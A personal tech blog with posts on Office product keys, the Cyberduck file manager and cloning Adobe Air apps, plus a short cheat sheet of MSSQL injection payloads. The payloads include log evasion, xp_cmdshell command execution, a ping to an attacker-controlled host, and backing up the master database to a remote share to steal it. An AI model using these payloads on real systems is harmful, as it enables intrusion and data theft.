Lost product keys

A few years back I stumbled upon a utility called Magical Jelly Bean with its intended purpose of finding the product key of installed Microsoft applications, primarily the OS itself as I used this to determine which VLK was used for imagine deployment in the datacenters.

Looks like the product has not received updates in awhile and I’ve been trying to find a key recently of my office installation so that I can migrate the install to a new fusion VM.

For starters we can determine the last 5 digits of a product key default in the office application.

:command prompt
\program files\microsoft office\office14\
cscript ospp.vbs /dstatus
::Last 5 characters of installed product key: XXXXX

Alternately we can completely change the product key
Expand the registration key, you will find different keys for the office suites looking like {XXX}
In each one of these look for DigitalProductID and ProductID, delete them, close registry restart the office apps and you will be prompted for a new key.

In office 2010 you can also change the key via the command line, this is new, 2 ways of doing so.
Option 1) Add/Remove programs, locate office, change, new product key (yawnnnnn)
Option 2) Instead of /dstatus argument for OSPP.VBS use /inpkey:XXXXX-XXXX-XXXX (key value)


Cloud file management! Cyberduck

Having installed OSX Lion I’ve been on an mission to re-evaluate all of my applications and remove or update those which I am still using.  A key tool i was missing and essential for every Apple is management of cloud storage repositories through 3rd party and to make matters even better support for less known providers protocol support FTP, SFTP, WebDAV, Amazon S3, Windows Azure and Google Storage.

Not just that but it’s free – everyone’s favorite price! Take a look at Cyberduck http://cyberduck.ch/ They also have a version out for Windows.

I’m really happy to see Google Docs support since i’ve been actively using it and trying to find the right place to organize and sort my docs directories.

How to run multiple Adobe Air apps Tweetdeck

Twitter columns can get pretty busy if your tweeting from multiple accounts.
I wanted to find the benefits of utilizing 2 display monitors for separate accounts or in some cases the same accounts with unique columns per screen for tweets based on topics, followers or lists.

An application has been written by Chris Deely named AirAppDuplicator
Download it here

Get started by clicking download and then on AirAppDuplicator.AIR package. Proceed past the warnings to install and trust this product (at your own risk). When the application has finished installing right click to run as Administrator if your in Windows to get the Air Apps to clone, you will only have to do this once.

Last step, navigate to the directory path of the application you want to duplicate, in my case it was Tweetdeck located in c:\program files (x86)\tweetdeck on my windows 7 machine and click to clone. What actually happens is AirAppDuplicator will copy the directory to a similar directory appending 2 at the end of the name.

I haven’t run into any issues yet with multiple instances and i’m not the author of the application. Use at your own risk! 😉

MSSQL Injection Commands and Output

» Microsoft SQL

Payload Description (if any)
‘admin –sp_password sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (–) can prevent SQL Injection queries being logged.
select @@version View database version.
select @@servername Misc. information disclosure
select @@microsoftversion Misc. information disclosure
select * from master..sysservers Misc. information disclosure
select * from sysusers View database usernames and passwords.
exec master..xp_cmdshell ‘ipconfig+/all’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+view’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+users’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘ping+system-controlled-by-attacker’ Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
BACKUP database master to disks=’\\{IP}\{sharename}\backupdb.dat’ Backup entire database to a file. This attack can be used to steal a database.
create table myfile (line varchar(8000))” bulk insert foo from ‘c:\inetpub\wwwroot\auth.asp’” select * from myfile”– Reading files on the filesystem.
xp_servicecontrol (START or STOP) Start and stop Windows Services.
str1 + str2 OR n+n Concat strings for blind SQL Injection tests.

Four-Tier Query

Web browser sends requests to the middle tier

A simple query

a pictures worth a thousand words

thank the academy for giving me the strength